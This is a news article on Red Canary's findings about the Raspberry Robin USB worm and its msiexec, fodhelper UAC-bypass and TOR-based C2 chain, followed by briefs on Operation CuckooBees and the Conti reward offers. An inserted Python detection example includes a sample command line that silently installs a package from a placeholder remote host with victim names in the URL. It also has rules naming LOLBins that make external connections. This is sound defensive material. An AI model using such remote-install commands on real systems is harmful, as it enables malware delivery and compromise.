Raspberry Robin worm spreads through USB drives, targets technology, manufacturing organizations

Red Canary Intelligence has been tracking a cluster of malicious activity that it calls ‘Raspberry Robin’ and has observed it targeting organizations with ties to technology and manufacturing, though it is not yet clear whether there are other links among the victims. The worm spreads via external drives and leverages the Windows Installer (msiexec) to reach out to QNAP-associated domains and download a malicious DLL.

“‘Raspberry Robin’ is Red Canary’s name for a cluster of activity we first observed in September 2021 involving a worm that is often installed via USB drive,” Red Canary researchers wrote in a company blog post. “This activity cluster relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names,” they added.

The researchers also observed that Raspberry Robin uses TOR exit nodes as additional command and control (C2) infrastructure. “Like most activity clusters we track, Raspberry Robin began as a handful of detections with similar characteristics that we saw in multiple customers’ environments, first noticed by Jason Killam from Red Canary’s Detection Engineering team,” the researchers wrote. “We saw Raspberry Robin activity as far back as September 2021, though most related activities occurred during or after January 2022. As we observed additional activity, we couldn’t find public reporting to corroborate our analysis, aside from some findings on VirusTotal that we suspected were related based on overlap in C2 domains,” they added.

While Red Canary has so far observed Raspberry Robin in organizations with ties to technology and manufacturing, the researchers “have several intelligence gaps around this cluster, including the operators’ objectives. While we don’t yet have the full picture, we want to share what we know about this activity cluster so far to enrich collective understanding of this threat and empower defenders to identify this activity,” they said.

Under the Raspberry Robin cluster name, the researchers group an entire chain of activity, including the initial access method, the worm itself, and the follow-on execution and C2 activity.

Red Canary researchers disclosed that Raspberry Robin uses cmd[dot]exe to read and execute a file stored on the infected external drive, and msiexec[dot]exe for outbound network communication to a rogue domain used as C2, from which it downloads and installs a malicious DLL. Subsequently, “msiexec[dot]exe launches a legitimate Windows utility, fodhelper[dot]exe, which in turn spawns rundll32[dot]exe to execute a malicious command. Processes launched by fodhelper[dot]exe run with elevated administrative privileges without requiring a User Account Control prompt,” they added.

It is unusual for fodhelper[dot]exe to be the parent of any process, which makes this another useful detection opportunity, according to the researchers.

The researchers also observed “outbound C2 activity involving the processes regsvr32[dot]exe, rundll32[dot]exe, and dllhost[dot]exe executing without any command-line parameters and making external network connections to IP addresses associated with TOR nodes. Additionally, some of the IP addresses in the connections host domains consist of random alphanumeric characters,” they added.
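The three detection opportunities above (msiexec.exe installing from a remote URL, any child process of fodhelper.exe, and regsvr32/rundll32/dllhost running with an empty argument list while connecting outside the network) can be expressed as simple rules over endpoint telemetry. The following is an added example written for this page, not Red Canary's own detection code. It assumes a Sysmon-like event shape (process-creation events with image, parent and command line; network events with image, command line and destination) and runs the rules over a constructed event list; every path, hostname and IP address in it is a placeholder, not an indicator from the report.

```python
"""Detection logic for the Raspberry Robin execution chain described above.

Added example, not Red Canary's code. It runs three rules over a constructed,
Sysmon-like event list: process-creation events carry image/parent/cmdline,
network events carry image/cmdline/dest_ip/dest_port. All paths, hostnames and
IPs are placeholders (the .invalid TLD and the TEST-NET-3 range), not real IOCs.
"""
import ipaddress
import re
import shlex

# Binaries the report lists as running with no arguments yet talking to TOR nodes.
LOLBINS_NO_ARGS = {"regsvr32.exe", "rundll32.exe", "dllhost.exe"}

# Address space treated as internal. ipaddress.is_global() is deliberately not
# used: the sample data uses TEST-NET-3 (203.0.113.0/24) as a stand-in for a
# public address, and Python classifies that documentation range as non-global.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

# Constructed sample telemetry (assumed shape; see module docstring).
EVENTS = [
    # msiexec.exe installing a package straight from an HTTP URL that embeds
    # the victim's device and user names, as the report describes.
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "msiexec /q /i http://qnap-placeholder.invalid:8080/WS01/alice"},
    # fodhelper.exe spawning rundll32.exe; fodhelper normally spawns nothing.
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\System32\fodhelper.exe",
     "cmdline": "rundll32.exe"},
    # rundll32.exe with an empty argument list connecting to an external IP.
    {"type": "network", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe", "dest_ip": "203.0.113.7", "dest_port": 443},
    # Benign: a local MSI install launched from Explorer.
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'msiexec /i "C:\Users\alice\Downloads\setup.msi"'},
    # Benign: rundll32 with arguments talking to an internal file server.
    {"type": "network", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL",
     "dest_ip": "10.0.0.5", "dest_port": 445},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def has_no_arguments(cmdline):
    """True when the command line is only the executable (quoted or not)."""
    return len(shlex.split(cmdline, posix=False)) <= 1


def is_external(ip):
    """True for addresses outside the RFC 1918, loopback and link-local ranges."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def detect(events):
    """Return (rule_name, detail) tuples for events matching the three rules."""
    alerts = []
    for e in events:
        image = basename(e["image"])
        if e["type"] == "process":
            # Rule 1: Windows Installer fetching its package over HTTP(S).
            if image == "msiexec.exe" and re.search(r"https?://", e["cmdline"], re.I):
                alerts.append(("msiexec_remote_install", e["cmdline"]))
            # Rule 2: any child of fodhelper.exe (the UAC-bypass launch).
            if basename(e["parent"]) == "fodhelper.exe":
                alerts.append(("fodhelper_child_process", image))
        elif e["type"] == "network":
            # Rule 3: argument-less regsvr32/rundll32/dllhost reaching outside.
            if (image in LOLBINS_NO_ARGS and has_no_arguments(e["cmdline"])
                    and is_external(e["dest_ip"])):
                alerts.append(("lolbin_no_args_external_connection",
                               f"{image} -> {e['dest_ip']}:{e['dest_port']}"))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"[{rule}] {detail}")
```

Running the block fires once per malicious sample event and stays silent on the two benign ones. Rule 3 needs the command line joined to the network event (Sysmon does this by ProcessGuid); in production the internal-range list should also cover the organization's own public prefixes and proxy addresses, or every outbound connection will look external.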

Red Canary said it did not know “how or where Raspberry Robin infects external drives to perpetuate its activity, though it’s likely this occurs offline or otherwise outside of our visibility. We also don’t know why Raspberry Robin installs a malicious DLL. One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis,” the researchers added.

“Perhaps our biggest question concerns the operators’ objectives. Absent additional information on later-stage activity, it’s difficult to make inferences on the goal or goals of these campaigns,” according to the researchers.

Last week, Cybereason released research on Operation CuckooBees, a 12-month investigation into a global cyber espionage campaign by the Winnti Group (APT 41), which it describes as ‘one of the largest IP theft campaigns of its kind coming from China.’ The hackers’ goal has been to steal sensitive proprietary information from technology and manufacturing companies, mainly in East Asia, Western Europe, and North America, in the defense, energy, aerospace, biotech, and pharma industries.

The intelligence on various cyberespionage threat groups comes at the same time as the U.S. Department of State raised the stakes by announcing that it is making reward offers for information to bring Conti ransomware co-conspirators to justice. A total reward of up to US$15 million has been announced for information on the Conti ransomware group, which has been responsible for hundreds of ransomware incidents over the past two years.

The FBI estimates that as of January this year, “there had been over 1,000 victims of attacks associated with Conti ransomware with victim payouts exceeding $150,000,000, making the Conti Ransomware variant the costliest strain of ransomware ever documented,” the State Department said.

The U.S. government is offering up to $10 million for information on Conti leaders’ identity and location, and an additional $5 million for details leading to the arrest and/or conviction of any individual in any country conspiring to participate in or attempting to participate in a Conti variant ransomware incident.
